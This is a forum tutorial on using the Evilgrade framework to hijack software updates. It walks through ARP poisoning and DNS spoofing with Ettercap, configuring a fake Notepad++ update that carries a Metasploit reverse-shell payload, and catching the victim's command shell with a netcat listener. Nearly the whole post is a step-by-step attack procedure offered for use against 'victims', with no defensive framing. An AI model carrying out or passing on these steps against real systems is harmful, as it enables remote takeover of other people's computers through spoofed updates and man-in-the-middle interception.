If this is your first visit, be sure to
check out the Forum Rules by clicking the
link above. You may have to register
before you can post: click the register link above to proceed. To start viewing messages,
select the forum that you want to visit from the selection below.

How To: Evilgrade

Today ill explain how to use Evilgrade. Evilgrade is a modular framework that allows an attacker to take advantage of poorly implemented software upgrades. An attacker can use Evilgrade in combination with DNS spoofing or a MITM attack to spoof a software update and trick the victim computer into executing arbitrary code such as a Metasploit’s Payload. Currently, the Evilgrade framework supports the following software: Java plugin, Winzip, Winamp, MacOS, OpenOffices, iTunes, Linkedin Toolbar, Download Accelerator, notepad++, and speedbit. In this tut, i illustrate how to use Evilgrade with a DNS Spoofing attack to execute a reverse shell on a target computer.

My target will be my Winblows XP machine using Notepad++ on my own network.

First you will need to download Evilgrade from:

Code:

www.infobyte.com.ar

Once you have downloaded the file you need to decompress it:

Code:

BT ~ / tar zxvf lsr-evilgrade-1.0.0.tar.gz

Ok so navigate to the folder by:

Code:

BT ~ / cd lsr-evilgrade

Now to start Evilgrade you type:

Code:

./evilgrade

Now that your in Evilgrade you can have look at the modules you would look to spoof. You can do that by typing:

Code:

show modules

As you can see there are a few you can spoof, but today ill be using Notepad++.

Ok so you have picked your weapon.. err module? We now have to config that module. You can do this by typing:

Code:

config notepadplus

NOTE: If your not using Notepad++ put the name of the module you would like to configure.

So now to see all the options for that module you type:

Code:

show options

At this point you can see all the options of that module. You can see the virtual host and the agent to inject.

Ok so now we have gotten this far. Have i lost you? Good. The next step is choosing what payload to use with the agent.
You will have to open up a new shell and navigate to the Metasploit directory to see what we can use. You can do that by following the commands below:

Code:

BT ~ / cd /pentest/exploits/framework3
BT ~ / ./msfpayload

Now find what payload you wish to use and remember where it is located.
I will be using windows/shell_reverse_tcp
So now we go back the the Evilgrade shell and set the agent. To set the agent follow the commands below:

NOTE:LHOST is your IP and LPORT is the port you want it to connect to.
What that does is when the victim uses the update it will connect back to you.

So now the payload and update is all set. The next thing we want to do is DNS spoofing. In order to complete this you need some background knowledge to DNS spoofing.
So now we have to edit the etter.dns file. You can do that by follow these commands:

Code:

BT ~ / cd /usr/local/share/ettercap
BT ~ / nanoetter.dns

Delete all the junk in the file that wont be being used. It should look like this after you are done.NOTE: Remember im useing the Nopepad++ module, this will be different if your using another module.

Now were going to want to start Ettercap. While still in the shell you edited the etter.dns in, type the follow:

Code:

ettercap -G

Now that were in Ettercap we need to:
Sniff (eth0)
Scan for hosts
Set the targets: Default gateway + target pc
Use a MITM attack, ARP poisioning
Go to Plugins and use dns_spoof
Start sniffing

So now open another shell so we can listen in on the port that the module will open once the victim has download the "update"
To listen on the port type the following:

Code:

nc -l -v -p port

NOTE:The port number has to be the port number you set up with the module.

Now go back to Evilgrade and type the following:

Code:

start

Now you have to wait for the victim to accept the update when they open up the program that your module is for. Once they update the program you will see in the shell that you typed the commands in to listen for that port you will then be into their CMD.

I hope this has been a help in anyway, if you have any subjections to what i should add or change, please do hesitate to send me a pm about it.